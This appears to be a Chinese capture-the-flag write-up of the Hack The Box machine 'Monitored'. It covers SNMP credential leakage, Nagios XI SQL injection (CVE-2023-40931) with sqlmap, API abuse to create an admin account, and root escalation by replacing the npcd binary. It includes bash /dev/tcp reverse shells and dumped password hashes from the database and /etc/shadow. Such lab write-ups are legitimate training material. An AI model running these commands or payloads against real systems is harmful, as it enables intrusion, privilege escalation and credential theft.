知识点:161端口SNMP分析;NagiosXi相关漏洞CVE(Sqli&后台RCE);自执行服务脚本漏洞。
Scan
┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ sudo nmap -sC -sV -sU -T4 -Pn 10.10.11.248
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-20 09:06 EST
Warning: 10.10.11.248 giving up on port because retransmission cap hit (6).
Stats: 0:14:09 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 81.30% done; ETC: 09:23 (0:03:15 remaining)
Stats: 0:32:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.91% done; ETC: 09:38 (0:00:01 remaining)
Stats: 0:32:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.91% done; ETC: 09:38 (0:00:01 remaining)
Nmap scan report for nagios.monitored.htb (10.10.11.248)
Host is up (0.39s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
123/udp open ntp NTP v4 (unsynchronized)
| ntp-info:
|_
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 522.86 Kb sent, 522.86 Kb received
| VMware VMXNET3 Ethernet Controller
| IP address: 10.10.11.248 Netmask: 255.255.254.0
| MAC address: 00:50:56:b9:64:03 (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 76.39 Mb sent, 51.24 Mb received
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:389 0.0.0.0:0
| TCP 10.10.11.248:46074 10.10.16.48:7777
| TCP 10.10.11.248:49754 10.10.14.146:4444
| TCP 127.0.0.1:25 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.1:5432 0.0.0.0:0
| TCP 127.0.0.1:7878 0.0.0.0:0
| TCP 127.0.0.1:41018 127.0.1.1:80
| TCP 127.0.0.1:41028 127.0.1.1:80
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:162 *:*
| UDP 10.10.11.248:123 *:*
|_ UDP 127.0.0.1:123 *:*
| snmp-processes:
| 1:
| Name: systemd
| Path: /sbin/init
| 2:
| Name: kthreadd
| 3:
| Name: rcu_gp
| 4:
| Name: rcu_par_gp
| 5:
| Name: kworker/0:0-events
| 6:
| Name: kworker/0:0H-events_highpri
| 8:
| Name: mm_percpu_wq
| 9:
| Name: rcu_tasks_rude_
| 10:
| Name: rcu_tasks_trace
| 11:
| Name: ksoftirqd/0
| 12:
| Name: rcu_sched
| 13:
| Name: migration/0
| 15:
| Name: cpuhp/0
| 16:
| Name: cpuhp/1
| 17:
| Name: migration/1
| 18:
| Name: ksoftirqd/1
| 20:
| Name: kworker/1:0H-events_highpri
| 23:
| Name: kdevtmpfs
| 24:
| Name: netns
| 25:
| Name: kauditd
| 26:
| Name: khungtaskd
| 27:
| Name: oom_reaper
| 28:
| Name: writeback
| 29:
| Name: kcompactd0
| 30:
| Name: ksmd
| 31:
| Name: khugepaged
| 49:
| Name: kintegrityd
| 50:
| Name: kblockd
| 51:
| Name: blkcg_punt_bio
| 52:
| Name: edac-poller
| 53:
| Name: devfreq_wq
| 54:
| Name: kworker/0:1H-kblockd
| 56:
| Name: kswapd0
| 57:
| Name: kthrotld
| 58:
| Name: irq/24-pciehp
| 59:
| Name: irq/25-pciehp
| 60:
| Name: irq/26-pciehp
| 61:
| Name: irq/27-pciehp
| 62:
| Name: irq/28-pciehp
| 63:
| Name: irq/29-pciehp
| 64:
| Name: irq/30-pciehp
| 65:
| Name: irq/31-pciehp
| 66:
| Name: irq/32-pciehp
| 67:
| Name: irq/33-pciehp
| 68:
| Name: irq/34-pciehp
| 69:
| Name: irq/35-pciehp
| 70:
| Name: irq/36-pciehp
| 71:
| Name: irq/37-pciehp
| 72:
| Name: irq/38-pciehp
| 73:
| Name: irq/39-pciehp
| 74:
| Name: irq/40-pciehp
| 75:
| Name: irq/41-pciehp
| 76:
| Name: irq/42-pciehp
| 77:
| Name: irq/43-pciehp
| 78:
| Name: irq/44-pciehp
| 79:
| Name: irq/45-pciehp
| 80:
| Name: irq/46-pciehp
| 81:
| Name: irq/47-pciehp
| 82:
| Name: irq/48-pciehp
| 83:
| Name: irq/49-pciehp
| 84:
| Name: irq/50-pciehp
| 85:
| Name: irq/51-pciehp
| 86:
| Name: irq/52-pciehp
| 87:
| Name: irq/53-pciehp
| 88:
| Name: irq/54-pciehp
| 89:
| Name: irq/55-pciehp
| 90:
| Name: acpi_thermal_pm
| 91:
| Name: ipv6_addrconf
| 101:
| Name: kstrp
| 104:
| Name: zswap-shrink
| 105:
| Name: kworker/u5:0
| 127:
| Name: kworker/1:1H-kblockd
| 153:
| Name: mpt_poll_0
| 155:
| Name: mpt/0
| 156:
| Name: ata_sff
| 157:
| Name: scsi_eh_0
| 158:
| Name: scsi_tmf_0
| 159:
| Name: scsi_eh_1
| 160:
| Name: scsi_eh_2
| 161:
| Name: scsi_tmf_1
| 163:
| Name: scsi_tmf_2
| 164:
| Name: scsi_eh_3
| 165:
| Name: scsi_tmf_3
| 166:
| Name: scsi_eh_4
| 167:
| Name: scsi_tmf_4
| 168:
| Name: scsi_eh_5
| 169:
| Name: scsi_tmf_5
| 170:
| Name: scsi_eh_6
| 171:
| Name: scsi_tmf_6
| 172:
| Name: scsi_eh_7
| 173:
| Name: scsi_tmf_7
| 174:
| Name: scsi_eh_8
| 175:
| Name: scsi_tmf_8
| 176:
| Name: scsi_eh_9
| 177:
| Name: scsi_tmf_9
| 178:
| Name: scsi_eh_10
| 179:
| Name: scsi_tmf_10
| 180:
| Name: scsi_eh_11
| 181:
| Name: scsi_tmf_11
| 182:
| Name: scsi_eh_12
| 183:
| Name: scsi_tmf_12
| 184:
| Name: scsi_eh_13
| 185:
| Name: scsi_tmf_13
| 186:
| Name: scsi_eh_14
| 187:
| Name: scsi_tmf_14
| 188:
| Name: scsi_eh_15
| 189:
| Name: scsi_tmf_15
| 190:
| Name: scsi_eh_16
| 191:
| Name: scsi_tmf_16
| 192:
| Name: scsi_eh_17
| 193:
| Name: scsi_tmf_17
| 194:
| Name: scsi_eh_18
| 195:
| Name: scsi_tmf_18
| 196:
| Name: scsi_eh_19
| 197:
| Name: scsi_tmf_19
| 198:
| Name: scsi_eh_20
| 199:
| Name: scsi_tmf_20
| 200:
| Name: scsi_eh_21
| 201:
| Name: scsi_tmf_21
| 202:
| Name: scsi_eh_22
| 203:
| Name: scsi_tmf_22
| 204:
| Name: scsi_eh_23
| 205:
| Name: scsi_tmf_23
| 206:
| Name: scsi_eh_24
| 207:
| Name: scsi_tmf_24
| 208:
| Name: scsi_eh_25
| 209:
| Name: scsi_tmf_25
| 210:
| Name: scsi_eh_26
| 211:
| Name: scsi_tmf_26
| 212:
| Name: scsi_eh_27
| 213:
| Name: scsi_tmf_27
| 214:
| Name: scsi_eh_28
| 215:
| Name: scsi_tmf_28
| 216:
| Name: scsi_eh_29
| 217:
| Name: scsi_tmf_29
| 218:
| Name: scsi_eh_30
| 219:
| Name: scsi_tmf_30
| 220:
| Name: scsi_eh_31
| 221:
| Name: scsi_tmf_31
| 249:
| Name: kworker/u4:30-ext4-rsv-conversion
| 250:
| Name: kworker/u4:31-ext4-rsv-conversion
| 252:
| Name: scsi_eh_32
| 253:
| Name: scsi_tmf_32
| 284:
| Name: jbd2/sda1-8
| 285:
| Name: ext4-rsv-conver
| 323:
| Name: systemd-journal
| Path: /lib/systemd/systemd-journald
| 346:
| Name: systemd-udevd
| Path: /lib/systemd/systemd-udevd
| 391:
| Name: irq/16-vmwgfx
| 393:
| Name: ttm_swap
| 394:
| Name: cryptd
| 395:
| Name: card0-crtc0
| 398:
| Name: card0-crtc1
| 399:
| Name: card0-crtc2
| 401:
| Name: card0-crtc3
| 403:
| Name: card0-crtc4
| 405:
| Name: card0-crtc5
| 407:
| Name: card0-crtc6
| 409:
| Name: card0-crtc7
| 422:
| Name: VGAuthService
| Path: /usr/bin/VGAuthService
| 424:
| Name: vmtoolsd
| Path: /usr/bin/vmtoolsd
| 446:
| Name: auditd
| Path: /sbin/auditd
| 458:
| Name: laurel
| Path: /usr/local/sbin/laurel
| Params: --config /etc/laurel/config.toml
| 463:
| Name: kworker/1:3-events
| 517:
| Name: audit_prune_tre
| 543:
| Name: hwmon1
| 551:
| Name: cron
| Path: /usr/sbin/cron
| Params: -f
| 552:
| Name: dbus-daemon
| Path: /usr/bin/dbus-daemon
| Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
| 554:
| Name: rsyslogd
| Path: /usr/sbin/rsyslogd
| Params: -n -iNONE
| 556:
| Name: systemd-logind
| Path: /lib/systemd/systemd-logind
| 558:
| Name: wpa_supplicant
| Path: /sbin/wpa_supplicant
| Params: -u -s -O /run/wpa_supplicant
| 561:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 591:
| Name: sh
| Path: /bin/sh
| Params: -c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
| 646:
| Name: dhclient
| Path: /sbin/dhclient
| Params: -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
| 716:
| Name: avahi-autoipd
| Path: avahi-autoipd: [eth0] sleeping
| 717:
| Name: avahi-autoipd
| Path: avahi-autoipd: [eth0] callout dispatcher
| 768:
| Name: snmptrapd
| Path: /usr/sbin/snmptrapd
| Params: -LOw -f -p /run/snmptrapd.pid
| 788:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
| 791:
| Name: ntpd
| Path: /usr/sbin/ntpd
| Params: -p /var/run/ntpd.pid -g -u 108:116
| 800:
| Name: agetty
| Path: /sbin/agetty
| Params: -o -p -- u --noclear tty1 linux
| 806:
| Name: sshd
| Path: sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
| 852:
| Name: shellinaboxd
| Path: /usr/bin/shellinaboxd
| Params: -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit
| 855:
| Name: shellinaboxd
| Path: /usr/bin/shellinaboxd
| Params: -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit
| 856:
| Name: slapd
| Path: /usr/sbin/slapd
| Params: -h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d
| 866:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 878:
| Name: postgres
| Path: /usr/lib/postgresql/13/bin/postgres
| Params: -D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf
| 901:
| Name: postgres
| Path: postgres: 13/main: checkpointer
| 902:
| Name: postgres
| Path: postgres: 13/main: background writer
| 903:
| Name: postgres
| Path: postgres: 13/main: walwriter
| 904:
| Name: postgres
| Path: postgres: 13/main: autovacuum launcher
| 905:
| Name: postgres
| Path: postgres: 13/main: stats collector
| 906:
| Name: postgres
| Path: postgres: 13/main: logical replication launcher
| 939:
| Name: mariadbd
| Path: /usr/sbin/mariadbd
| 993:
| Name: snmptt
| Path: /usr/bin/perl
| Params: /usr/sbin/snmptt --daemon
| 995:
| Name: snmptt
| Path: /usr/bin/perl
| Params: /usr/sbin/snmptt --daemon
| 1033:
| Name: xinetd
| Path: /usr/sbin/xinetd
| Params: -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
| 1552:
| Name: sudo
| Path: sudo
| Params: -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
| 1553:
| Name: bash
| Path: /bin/bash
| Params: -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
| 1596:
| Name: exim4
| Path: /usr/sbin/exim4
| Params: -bd -q30m
| 3687:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 3688:
| Name: sh
| Path: /bin/sh
| Params: -c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1
| 3689:
| Name: php
| Path: /usr/bin/php
| Params: -q /usr/local/nagiosxi/cron/cmdsubsys.php
| 3694:
| Name: sh
| Path: sh
| Params: -c bash -c 'bash -i >& /dev/tcp/10.10.14.146/4444 0>&1'
| 3695:
| Name: bash
| Path: bash
| Params: -c bash -i >& /dev/tcp/10.10.14.146/4444 0>&1
| 3696:
| Name: bash
| Path: bash
| Params: -i
| 3718:
| Name: python3
| Path: python3
| Params: -c import pty; pty.spawn("/bin/bash")
| 3719:
| Name: bash
| Path: /bin/bash
| 4135:
| 4578:
| Name: kworker/0:1-cgroup_destroy
| 4767:
| Name: kworker/u4:0-flush-8:0
| 4982:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 4983:
| Name: sh
| Path: /bin/sh
| Params: -c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1
| 4984:
| Name: php
| Path: /usr/bin/php
| Params: -q /usr/local/nagiosxi/cron/cmdsubsys.php
| 5094:
| Name: sh
| Path: sh
| Params: -c bash -c 'bash -i >&/dev/tcp/10.10.16.48/7777 0>&1'
| 5095:
| Name: bash
| Path: bash
| Params: -c bash -i >&/dev/tcp/10.10.16.48/7777 0>&1
| 5096:
| Name: bash
| Path: bash
| Params: -i
| 5232:
| Name: kworker/1:0-events
| 5312:
| Name: kworker/0:2-events
| 5316:
| 5341:
| 5346:
| 5349:
| 5352:
| 5363:
| Name: apache2
| Path: /usr/sbin/apache2
| 5364:
| 5371:
| Name: apache2
| Path: /usr/sbin/apache2
| 5373:
| 5379:
| 5380:
| 5381:
| 5383:
| 5384:
| 5385:
| 5387:
| 5396:
| 5397:
| Name: cron
| 5398:
| Name: sh
| 5399:
| Name: php
| 5400:
| 5401:
| 5404:
| Name: sh
| 5405:
| Name: bash
| 5406:
| Name: bash
| 5408:
| 5411:
| 5412:
| 5413:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
|_ 5414:
| snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
|_ System uptime: 31m38.33s (189833 timeticks)
| snmp-win32-software:
| 略
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 6f3fa7421af94c6500000000
| snmpEngineBoots: 35
|_ snmpEngineTime: 31m38s
162/udp open snmp net-snmp; net-snmp SNMPv3 server
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 5a44ab2146ff4c6500000000
| snmpEngineBoots: 26
|_ snmpEngineTime: 31m38s
402/udp open|filtered genie
17673/udp open|filtered unknown
18373/udp open|filtered unknown
29243/udp open|filtered unknown
Service Info: Host: monitored
Host script results:
|_clock-skew: 4s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2945.50 seconds
Enum
扫描结果有ldap,ldapsearch扫一波
┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ ldapsearch -x -H ldap://monitored.htb -b "DC=monitored,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=monitored,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# monitored.htb
dn: dc=monitored,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: monitored.htb
dc: monitored
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
返回了域 "monitored.htb" 的基本信息但没啥用,再看看161端口。使用snmpwalk工具 ,参考文章:
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
snmpwalk -v2c -c public monitored.htb
svc XjH7VCehowpR1xZB
Web
发现上面的用户登录不了,扫一下目录
看到除了admin还有接口等api,搜一波资料和cve,可以看到文章
https://support.nagios.com/forum/viewtopic.php?f=16&t=42923
https://support.nagios.com/forum/viewtopic.php?f=16&t=58783
使用api接口配合用户拿到token
┌──(root㉿kali)-[/home/kali/Desktop/htb/Monitored]
└─# curl -POST -k 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'
{"username":"svc","user_id":"2","auth_token":"37d33a2be847fa499528a908aa4d165cdf5f7fde","valid_min":500,"valid_until":"Sat, 20 Jan 2024 17:48:41 -0500"}
搜索得漏洞编码是CVE-2023-40931,id参数在nagiosxi/admin/banner_message-ajaxhelper.php路径可sql注入 ,直接上sqlmap
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=37d33a2be847fa499528a908aa4d165cdf5f7fde" --level 5 --risk 3 -p id --batch
最后慢慢注入库表字段后dump
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
Database: nagiosxi
Table: xi_users
[8 entries]
+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | email | name | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change |
+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1 | [email protected] | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 0 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 0 | 1701427555 |
| 2 | [email protected] | svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1705760765 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 7 | 1699697433 |
| 6 | [email protected] | opcode | Ou33MAj0IfCIJg3iHOLY0rnKIgCj49loAL2RljN8neqORlheNJWYK0OiuqqhXO4f | 1 | $2a$10$b43fe283c318f646849d8uAujK14jfDD0xqBFR05Xt2lvX1al5m6u | opcode | 0 | 1705758991 | 0 | 0 | 0 | 0 | peJDmtr59inAnK3BYveojo8tAAVUY7pTNdQ7ghKLMd46eDYbksP2KfKtWi2jmUMg | 0 | 0 | 1705759009 |
| 7 | [email protected] | gage | 5HHXHqKnhAZTv4cmv8nALgZNrm59k8eVeE7M8j4NPH3eAFfVheYps3OTJKeci8GE | 1 | $2a$10$593e290d91b0b351ec413uLOXA7HHETzepbggKDRsCNlhkQ8/Fyu6 | caixukun | 0 | 1705759068 | 0 | 0 | 0 | 1705759323 | mlfjjUVpKgmYOKi2g7UHPf7NRse6cGtFeI4FKbusEAZiaTCDUdiPeWnYJEXJjua8 | 0 | 1 | 1705759127 |
| 8 | [email protected] | xyzxyz | 6lKRku0Nr54gZdLOgKUqGT5Mdb2Aj0pmsSu03AOO0VUqbroBMeqMYLR4kj6Hhoko | 1 | $2a$10$365df3d40687ff5fbc032uHet20Fjzb.vlnMuSgvoU2tFmzCMTUOq | xyzxyz | 0 | 1705759430 | 0 | 0 | 0 | 0 | JbdSTls6XhslQnirqE2KQtAPV9D92QIPuumiqBJhbJhakkWdjg8qH9H53TufqLuM | 0 | 0 | 1705759453 |
| 9 | [email protected] | admin | 4ErhsgfjJQCZJaE8lk0UsNTbcoOnQvAnBQGYfVIqq5jhbGmtqDcDfgC56oVLeFTA | 1 | $2a$10$47b968ae15ea823bd821buBL6rwR20PYKHUEB8/NAdbsAUDT.rVT2 | admin | 0 | 1705760553 | 0 | 0 | 0 | 0 | DHkQ9rfItbfuBAhErGcKkS5ebfuqcE9KsbPHPHdrch3ifOA2QTZbI56UNXv3pSvq | 0 | 0 | 1705760617 |
| 10 | admin111@localhost | Admin111 | ZLA8L2tecJNFm8BCuZhl9DrGoopfnLPkEYXLWFqIBdNFou5h7vcqnOvopDXaMpQt | 1 | $2a$10$e26442a9d958ed79c4dbfeMqqnMpqAqLoYEfuLZ6mHYFN1a7OLeMu | admin111 | 0 | 1705761352 | 0 | 0 | 0 | 0 | EtleX3SAUMa2e2IdKu2glhnXh93JtUvqr8K3UCYehJ3WvBgMhWkOBPOGub98FmdP | 0 | 0 | 1705761394 |
| 11 | [email protected] | geqian | XX0FrT4mKl0KcOIAAC6IilZCJkrqEkGag5rLIsUZ0YqSFC8LRDF8bP0qgRdPlQ5r | 1 | $2a$10$f5149f642d681ab41e09euzmac61tKRbKM4sVRlsLajUbJgvRDljG | geqian | 0 | 1705761542 | 0 | 0 | 0 | 0 | akv9G37D9PH4BZ4GnHG2FlVKo3oJF76La586sjZtqqWmDejvp2H4l7v0iUEHXrVq | 0 | 0 | 1705761615 |
+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
[10:02:33] [INFO] table 'nagiosxi.xi_users' dumped to CSV file '/root/.local/share/sqlmap/output/nagios.monitored.htb/dump/nagiosxi/xi_users.csv'
[10:02:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/nagios.monitored.htb'
[*] ending @ 10:02:33 /2024-01-20/
然后使用curl命令向 Nagios XI 的 API 发送 POST 请求,创建一个新的用户账户
┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ curl -POST -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=geqian&password=geqian&name=geqian&[email protected]&auth_level=admin"
{
"success": "User account geqian was added successfully!",
"user_id": 11
}
revshell
账户添加成功,登录进去找到核心配置,添加一个commands
bash -c 'bash -i >& /dev/tcp/10.10.14.64/4444 0>&1'
之后Monitoring > Services > Add New
run command后即可拿revshell
ROOT
nagios :~$ sudo -l
sudo -l
Matching Defaults entries for nagios on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User nagios may run the following commands on localhost:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
(root) NOPASSWD: /usr/bin/php
/usr/local/nagiosxi/scripts/migrate/migrate.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *
进入对应的目录,遍历附近目录可以发现,脚本/usr/local/nagiosxi/scripts/manage_services.sh提供启动和停止服务,且文件/usr/local/nagios/bin/npcd由用户nagios所有。所以可以通过用反向shell代码修改来修改文件中的二进制内容。
nagios@monitored:~$ rm /usr/local/nagios/bin/npcd
nagios@monitored:~$ vi /usr/local/nagios/bin/npcd
nagios@monitored:~$ chmod 777 /usr/local/nagios/bin/npcd
nagios@monitored:/usr/local/nagios/bin$ cat /usr/local/nagios/bin/npcd
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.64/5555 0>&1
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh restart np
拿下
root:$y$j9T$LLy.W6CI0K6McgXMKio0i1$1omBVYjsg.8qEzyjkL.3kXtpAMZNc7x9CMwOnrwltJ8:19671:0:99999:7:::
daemon:*:19670:0:99999:7:::
bin:*:19670:0:99999:7:::
sys:*:19670:0:99999:7:::
sync:*:19670:0:99999:7:::
games:*:19670:0:99999:7:::
man:*:19670:0:99999:7:::
lp:*:19670:0:99999:7:::
mail:*:19670:0:99999:7:::
news:*:19670:0:99999:7:::
uucp:*:19670:0:99999:7:::
proxy:*:19670:0:99999:7:::
www-data:*:19670:0:99999:7:::
backup:*:19670:0:99999:7:::
list:*:19670:0:99999:7:::
irc:*:19670:0:99999:7:::
gnats:*:19670:0:99999:7:::
nobody:*:19670:0:99999:7:::
_apt:*:19670:0:99999:7:::
systemd-network:*:19670:0:99999:7:::
systemd-resolve:*:19670:0:99999:7:::
messagebus:*:19670:0:99999:7:::
systemd-timesync:*:19670:0:99999:7:::
avahi-autoipd:*:19670:0:99999:7:::
sshd:*:19670:0:99999:7:::
svc:$y$j9T$JKvaJakBax4xU3.kZFe221$D2o.A3O6EXWgKPzpD8Gky7cPbXZ/a9Ey/9/OM1AoE80:19671:0:99999:7:::
systemd-coredump:!*:19670::::::
mysql:!:19670:0:99999:7:::
ntp:*:19670:0:99999:7:::
postgres:*:19670:0:99999:7:::
Debian-exim:!:19670:0:99999:7:::
uuidd:*:19670:0:99999:7:::
openldap:!:19670:0:99999:7:::
Debian-snmp:!:19670:0:99999:7:::
snmptt:*:19670:0:99999:7:::
shellinabox:*:19670:0:99999:7:::
nagios:$y$j9T$EnaS672RtIQB0i6zh.ooO/$gkWPA1PKoIQH.ACc6NVntLPY9x55i08J4S6c1Rpvqn.:19671:0:99999:7:::
_laurel:!:19698::::::
原文始发于微信公众号(搁浅安全):HTB-Monitored(Medium)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论